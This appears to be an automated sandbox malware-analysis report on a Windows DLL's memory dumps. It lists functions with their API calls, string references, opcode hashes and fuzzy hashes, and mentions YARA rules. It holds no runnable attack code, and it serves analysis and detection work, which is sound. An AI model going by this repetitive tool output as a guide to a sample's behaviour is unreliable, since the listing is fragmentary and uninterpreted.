Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 71cd583975bbac783dbfc94d112b8ba664d043a343ea598c65e8a63601b73b49
Instruction ID: 57bbb0efc33855bd38201323e3e7b830b2d127242a58c3c31eabc81b6743c8fa
Opcode Fuzzy Hash: 71cd583975bbac783dbfc94d112b8ba664d043a343ea598c65e8a63601b73b49
Instruction Fuzzy Hash: 3771D635900619ABDB24CFA4CE58BEA7378AF45704F0005EDD91AA7BB0EB745E48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DF9E0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6E7D0000,?,00000104), ref: 6E7DFABD
GetModuleHandleW.KERNEL32(00000000), ref: 6E7DFB37

Strings

REGISTRY, xrefs: 6E7DFC6D
Module, xrefs: 6E7DFBE2
APPID, xrefs: 6E7DFA7D
Module_Raw, xrefs: 6E7DFC0F

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 19eca9856bbead052f9cf4a0844341a73366057c10bf330b6599ed4e06f11852
Instruction ID: 29d0bf45f8e0973f93a2d9d220fba51c6ea1f492e463a453fdbd79f1795b6714
Opcode Fuzzy Hash: 19eca9856bbead052f9cf4a0844341a73366057c10bf330b6599ed4e06f11852
Instruction Fuzzy Hash: E661D4359006298BDB28CF90CE64BEA7378FF45714F1445ADD80EA76A0EB745E88CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FF18F, Relevance: 10.7, APIs: 7, Instructions: 160fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,6E7FF921,?,?,?,?,?), ref: 6E7FF1D1
__fassign.LIBCMT ref: 6E7FF253
__fassign.LIBCMT ref: 6E7FF272
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6E7FF29F
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6E7FF921), ref: 6E7FF2BE
WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6E7FF921), ref: 6E7FF2F7

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 0bb75076363499baba8fdeb675c6c08ec72aedb6997f7b2b022853a001becf42
Instruction ID: 3ff553f97f1b3949e3317657a4c44d0f12d2c908491951d700b65079fecc598e
Opcode Fuzzy Hash: 0bb75076363499baba8fdeb675c6c08ec72aedb6997f7b2b022853a001becf42
Instruction Fuzzy Hash: CC518D70A04649DFDB05CFE8C991AEEBBF8FF09310F20456AE555E7251EB309942CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D57C0, Relevance: 10.6, APIs: 7, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 6E7D57C0: GetCurrentProcessorNumber.KERNEL32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D5825
Part of subcall function 6E7D57C0: CoUninitialize.OLE32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D5870
Part of subcall function 6E7D57C0: GetSystemDefaultLangID.KERNEL32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D58C2
Part of subcall function 6E7D57C0: SwitchToThread.KERNEL32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D590A
Part of subcall function 6E7D57C0: GdiFlush.GDI32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D5938

GdiFlush.GDI32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D5945

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Flush$CurrentDefaultLangNumberProcessorSwitchSystemThreadUninitialize
String ID:
API String ID: 427165119-0
Opcode ID: 3a6034ff7c50092351d27208fb5b01785cbf0ec085541f63531820d0b7204995
Instruction ID: 2ead49a549f38a6460bd51ce81799c16a0cbe302722de03fbdeb922a3ebe9fee
Opcode Fuzzy Hash: 3a6034ff7c50092351d27208fb5b01785cbf0ec085541f63531820d0b7204995
Instruction Fuzzy Hash: 82418931C24A00CFD3069BB4A5562DDF3A8DF6B3A2F298B26D455B7071F73008D8CA81

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E8A10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E7E8A3B
___except_validate_context_record.LIBVCRUNTIME ref: 6E7E8A43
_ValidateLocalCookies.LIBCMT ref: 6E7E8AD1
__IsNonwritableInCurrentImage.LIBCMT ref: 6E7E8AFC
_ValidateLocalCookies.LIBCMT ref: 6E7E8B51

Strings

csm, xrefs: 6E7E8AE6

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e7a8dbda628a74c1351746150d8e891447de8f937491fed7466f6998b13775f0
Instruction ID: e3c2f7be165a903761e5479a0016596b580a9a5cfba3b1acdcd93059fd21fab6
Opcode Fuzzy Hash: e7a8dbda628a74c1351746150d8e891447de8f937491fed7466f6998b13775f0
Instruction Fuzzy Hash: 11419334A002099BDF11CFE8C944ADEBBB9BF45328F188565D815ABBB1D731EA05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7D40, Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,972AE1C9,?,00000000,?,00000000,8007000E), ref: 6E7E7DB3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E7E7DEA

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: e1378656dedadc59b4d8b156847baa8cf20b0fd4127b44ddceb7be296e517f5e
Instruction ID: b53fe588b696ce8a5ec7c0c91454dabc7c07e7849335a3a64e8d75d432967c1f
Opcode Fuzzy Hash: e1378656dedadc59b4d8b156847baa8cf20b0fd4127b44ddceb7be296e517f5e
Instruction Fuzzy Hash: 13314D72B00749ABD710CFE49D45FAB77ACEB45B10F10057DF909EA6D0D732A901CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E29B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6E7E2A40
GetWindowLongW.USER32(?,000000FC), ref: 6E7E2A54
CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6E7E2A6A
GetWindowLongW.USER32(?,000000FC), ref: 6E7E2A83
SetWindowLongW.USER32(?,000000FC,?), ref: 6E7E2A92

Strings

$, xrefs: 6E7E29F4

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 9539757965e2f4781115e588e1c4ee35a98e42c1eb120a7cae276ab1c3c07f0c
Instruction ID: c19f8259da6553ef33fc11b8bacebbdc8cd6a281da7166c6f69a6b0b147a6391
Opcode Fuzzy Hash: 9539757965e2f4781115e588e1c4ee35a98e42c1eb120a7cae276ab1c3c07f0c
Instruction Fuzzy Hash: 83413D71900609EFCB20CF99C944A9FBBF5FF48710F108A2DE95AA7660D771A954CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DDA70, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,972AE1C9), ref: 6E7DDAC4
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6E7DDADB
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,972AE1C9), ref: 6E7DDB10
RegCloseKey.ADVAPI32(00000000), ref: 6E7DDB23

Strings

RegOpenKeyTransactedW, xrefs: 6E7DDAD5
Advapi32.dll, xrefs: 6E7DDABF

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: 6e601eee6e636f5ab4016e2a3277b210581ba8eab3ad45109e27d92c324f4c24
Instruction ID: f72e69653d027d18ea3582ecbad4f7ad23e24697bee42a986283331b8b3f109e
Opcode Fuzzy Hash: 6e601eee6e636f5ab4016e2a3277b210581ba8eab3ad45109e27d92c324f4c24
Instruction Fuzzy Hash: 23318F71A0420AEFDB00CF99CD44FAABBB9FB49314F108629E915A7380D734A904CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D8220, Relevance: 10.6, APIs: 7, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E7D8251
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E7D825F
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E7D8274
SysFreeString.OLEAUT32(00000000), ref: 6E7D827F
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6E7D82A6
SysFreeString.OLEAUT32(00000000), ref: 6E7D82B3
SysFreeString.OLEAUT32 ref: 6E7D82E2

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: 77d993a9c1c4a2bddb5ebf08cf99521ad1eb5ecb28fd4289f86e38c61a8a7ceb
Instruction ID: 0400949e517fe8e77f8db24650bf876fa29e2b80f19b96b9109d833f4633d291
Opcode Fuzzy Hash: 77d993a9c1c4a2bddb5ebf08cf99521ad1eb5ecb28fd4289f86e38c61a8a7ceb
Instruction Fuzzy Hash: 94112C31640A19BBEB109FA4CD4DFAE7B64EF43720F10025DFA19A61D0CB706D48CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FD676, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 6E7FD6CC
ext-ms-, xrefs: 6E7FD6E0

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 616764b1c092c0ccc2c0084fc3ca71a8fe4dbd5907945b3b1c02e7c50119d620
Instruction ID: 5fe323985935568c9d8e8ff3152dd22cf13d0309dd3216cb92d0b9786181cac9
Opcode Fuzzy Hash: 616764b1c092c0ccc2c0084fc3ca71a8fe4dbd5907945b3b1c02e7c50119d620
Instruction Fuzzy Hash: 2421DB31D05615EBD7514EE98E44B4A7768EF027A4F110664EE1DAB3A4F730DD02CDE8

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D2040, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E7D206D

Part of subcall function 6E7E8B67: RaiseException.KERNEL32(?,?,6E7E5B36,000000FF,00000000,00000000,24448D6E,?,?,?,?,6E7E5B36,000000FF,6E81BC44,?,000000FF), ref: 6E7E8BC7

__CxxThrowException@8.LIBVCRUNTIME ref: 6E7D20B2
___std_exception_copy.LIBVCRUNTIME ref: 6E7D20DF

Strings

ios_base::failbit set, xrefs: 6E7D1F85, 6E7D2081
ios_base::eofbit set, xrefs: 6E7D2086
ios_base::badbit set, xrefs: 6E7D2077, 6E7D20A2, 6E7D20C3

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3941765731-1866435925
Opcode ID: 99af35d83d20b1a5ed009af78eaf370bf4badf458730077beab09c378ed5953b
Instruction ID: ad6b194981bf05ec13bdefe26f979eaca9c96de10fd0ffc0c3ac6be26643dd5e
Opcode Fuzzy Hash: 99af35d83d20b1a5ed009af78eaf370bf4badf458730077beab09c378ed5953b
Instruction Fuzzy Hash: 2011D5B29043096FC710DEE8D901BD6B39CAF05310F448A2AFA64DB650E771A54DCB94

Uniqueness

Uniqueness Score: -1.00%

Function 6E804586, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E8042CD: _free.LIBCMT ref: 6E8042F6

_free.LIBCMT ref: 6E8045D4

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

_free.LIBCMT ref: 6E8045DF
_free.LIBCMT ref: 6E8045EA
_free.LIBCMT ref: 6E80463E
_free.LIBCMT ref: 6E804649
_free.LIBCMT ref: 6E804654
_free.LIBCMT ref: 6E80465F

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction ID: 25335b2d4975d15fa70a517c5f57c2af9d7cb5eb9d389406e4d7712ece36a1f7
Opcode Fuzzy Hash: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction Fuzzy Hash: 32112E71694B04EBD620AFF4CC09FCFB79CAF64708F404E26A299A65A0DB65B506C650

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E0E40, Relevance: 9.2, APIs: 6, Instructions: 196threadCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 6E7E0EEE

Part of subcall function 6E7E2AE0: EnterCriticalSection.KERNEL32(6E81EAA4,?,?), ref: 6E7E2B2A
Part of subcall function 6E7E2AE0: GetClassInfoExW.USER32 ref: 6E7E2B5D
Part of subcall function 6E7E2AE0: GetClassInfoExW.USER32 ref: 6E7E2B74
Part of subcall function 6E7E2AE0: LeaveCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E2B83

Part of subcall function 6E7E7BC5: GetProcessHeap.KERNEL32(00000008,00000008,00000000,6E7E2972), ref: 6E7E7BCA
Part of subcall function 6E7E7BC5: HeapAlloc.KERNEL32(00000000), ref: 6E7E7BD1

SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,6E809440,000000FF), ref: 6E7E0F39
GetCurrentThreadId.KERNEL32 ref: 6E7E0FDE
EnterCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E0FEC
LeaveCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E1005
CreateWindowExW.USER32 ref: 6E7E103B

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ClassEnterHeapInfoLeave$AllocClientCreateCurrentErrorLastProcessRectThreadWindow
String ID:
API String ID: 859899439-0
Opcode ID: 4f0d7f07a734163022b5880773f83e26399710d18a6998709283eb7379623d6d
Instruction ID: dedd30c7a8a7a88f6d031657a6acec612305cf42f4d8fadb73b12cdd5313ed93
Opcode Fuzzy Hash: 4f0d7f07a734163022b5880773f83e26399710d18a6998709283eb7379623d6d
Instruction Fuzzy Hash: 10615B71A00606AFDB14CFA8D945BAEBBB9EF48710F14856DF815AB750EB30A950CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7EA892, Relevance: 9.2, APIs: 6, Instructions: 165COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E7EA943
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E7EA953

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 8819d7aaabea4ffc9a6a192d4c9f315576edf2b67da9dfcaa9c70fc9dc64df34
Instruction ID: 18cb7113cc401a26a584ebfa8f265fa546eba6e6236d9d04b06fc202a379b2b2
Opcode Fuzzy Hash: 8819d7aaabea4ffc9a6a192d4c9f315576edf2b67da9dfcaa9c70fc9dc64df34
Instruction Fuzzy Hash: B0418C325086465FDB828EF88B945DA7BBDAF133687160D79E054E7DB1E720C5138F60

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DE4E0, Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,972AE1C9,00000000,00000000), ref: 6E7DE51E
CharNextW.USER32(00000000,?,?,00000000), ref: 6E7DE54B
CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E7DE564
CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E7DE56F
CharNextW.USER32(00000001,?,?,00000000), ref: 6E7DE5DE

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: b41fea870acaabfd094358d249199264bda5ca2f7672bf87c6d458966749cbaf
Instruction ID: 5c4b25b256edca39e8140f8821c54bc2256276f09a05901a41417b7dc38ca68e
Opcode Fuzzy Hash: b41fea870acaabfd094358d249199264bda5ca2f7672bf87c6d458966749cbaf
Instruction Fuzzy Hash: AA411835E1011ACFCB02DFA9C980669F7F2EF89310B6445BAD84AD7368F7319945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DDB60, Relevance: 9.1, APIs: 6, Instructions: 121registryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E7DDA70: GetModuleHandleW.KERNEL32(Advapi32.dll,972AE1C9), ref: 6E7DDAC4
Part of subcall function 6E7DDA70: RegCloseKey.ADVAPI32(00000000), ref: 6E7DDB23

RegCloseKey.ADVAPI32(?,?,?), ref: 6E7DDBC2
RegEnumKeyExW.ADVAPI32 ref: 6E7DDC0A
RegEnumKeyExW.ADVAPI32 ref: 6E7DDC43
RegCloseKey.ADVAPI32(?), ref: 6E7DDC58
RegCloseKey.ADVAPI32(?), ref: 6E7DDC80
RegCloseKey.ADVAPI32(?), ref: 6E7DDCA8

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum$HandleModule
String ID:
API String ID: 2852649468-0
Opcode ID: 941917c93c2ddc015de69f7579e78ac7edda261e74f22d917cf6ceefa9250e85
Instruction ID: 7f34259e6356cc03ce0d509880e94591e02d46d7b3d40953b5dca0ae04ef6a31
Opcode Fuzzy Hash: 941917c93c2ddc015de69f7579e78ac7edda261e74f22d917cf6ceefa9250e85
Instruction Fuzzy Hash: B9416F71204305AFD710DFA5D858BABB7E8EB88354F004A2DF999D7290DB70D909CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 6E7EA971, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E7E898F,6E7E4560,6E7E4BF1,?,6E7E4E0E,?,00000001,?,?,00000001,?,6E81BB40,0000000C,6E7E4F02), ref: 6E7EA97F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E7EA98D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E7EA9A6
SetLastError.KERNEL32(00000000,6E7E4E0E,?,00000001,?,?,00000001,?,6E81BB40,0000000C,6E7E4F02,?,00000001,?), ref: 6E7EA9F8

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9157e92d3bf36ae87317946d87439ddb4f2158202dc83a7b20e1bf92a04a1d53
Instruction ID: 4f9d8473058d6266a81149ae56d4bbbec13839c422b09351a9c21a05529c919a
Opcode Fuzzy Hash: 9157e92d3bf36ae87317946d87439ddb4f2158202dc83a7b20e1bf92a04a1d53
Instruction Fuzzy Hash: 4301F13311CB135EAA515EF49E8D6962BA9EB027397210B3EF02C94DF4EF11484096C0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E5D58, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E7E5D5F
std::_Lockit::_Lockit.LIBCPMT ref: 6E7E5D69

Part of subcall function 6E7D1800: std::_Lockit::_Lockit.LIBCPMT ref: 6E7D181D
Part of subcall function 6E7D1800: std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D1839

codecvt.LIBCPMT ref: 6E7E5DA3
std::_Facet_Register.LIBCPMT ref: 6E7E5DBA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7E5DDA
__CxxThrowException@8.LIBVCRUNTIME ref: 6E7E5DF8

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 0866c571798f71f609fc86d5f4bd0b11cca70942c82561364481eb69321e978d
Instruction ID: 549471cadda8be96f6e458d77b7a2f0239f91c3805c5cb6193821be907d64276
Opcode Fuzzy Hash: 0866c571798f71f609fc86d5f4bd0b11cca70942c82561364481eb69321e978d
Instruction Fuzzy Hash: 1611087190011E8BCF05DFE4DA98AED77BCAF84364F240918E5157B6A0CF789A09CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D87F0, Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6E7D8B93
_com_issue_error.COMSUPP ref: 6E7D8B9D
_com_issue_error.COMSUPP ref: 6E7D8BA7
_com_issue_error.COMSUPP ref: 6E7D8BAD
_com_issue_error.COMSUPP ref: 6E7D8BB7
_com_issue_error.COMSUPP ref: 6E7D8BC1

Memory Dump Source

